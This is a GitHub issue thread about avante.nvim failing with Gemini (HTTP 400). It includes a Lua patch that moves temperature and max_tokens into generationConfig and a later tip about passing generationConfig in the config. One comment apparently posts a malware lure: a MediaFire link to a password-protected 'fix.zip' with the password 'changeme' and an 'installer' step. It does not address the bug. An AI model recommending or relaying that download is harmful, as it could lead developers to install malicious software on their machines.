### ISSUE TITLE
'API request failed with status 400' with Gemini

### ISSUE THREAD

**Issue by meinside** [yetone/avante.nvim#303]
Hi,

with the following neovim plugin options for Gemini, I see 'API request failed with status 400' errors:

```lua
opts = {
  provider = 'gemini',
  gemini = {
    endpoint = 'https://generativelanguage.googleapis.com/v1beta/models',
    model = 'gemini-1.5-flash-latest',
    timeout = 30000,
    temperature = 0,
    max_tokens = 4096,
    ['local'] = false,
  },
},
```

`temperature` and `maxOutputTokens` values need to be sent with [this specification](https://ai.google.dev/api/generate-content#generationconfig), so patching the [lua/avante/providers/gemini.lua](https://github.com/yetone/avante.nvim/blob/main/lua/avante/providers/gemini.lua) file like the following makes it work:

```patch
index 3f09a1d..dba334f 100644
--- a/lua/avante/providers/gemini.lua
+++ b/lua/avante/providers/gemini.lua
@@ -58,6 +58,13 @@ end
 M.parse_curl_args = function(provider, code_opts)
   local base, body_opts = P.parse_config(provider)

+  body_opts = {
+    generationConfig = {
+      temperature = body_opts.temperature,
+      maxOutputTokens = body_opts.max_tokens,
+    }
+  }
+
   return {
     url = Utils.trim(base.endpoint, { suffix = "/" })
       .. "/"
```

but I think it is not the desired pattern of building curl parameters.

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xingangshi** [comment]
I have the same problem. and I want to know the root path of this plugin. I don't know where is 'lua/avante/providers/gemini.lua'

**Comment by aarnphm** [comment]
note that you can also just pass in `generationConfig` into the config

```lua
opts = {
  gemini = {
    ...,
    generationConfig = {
      stopSequences = {"philosopher", "function" }
    },
  }
}
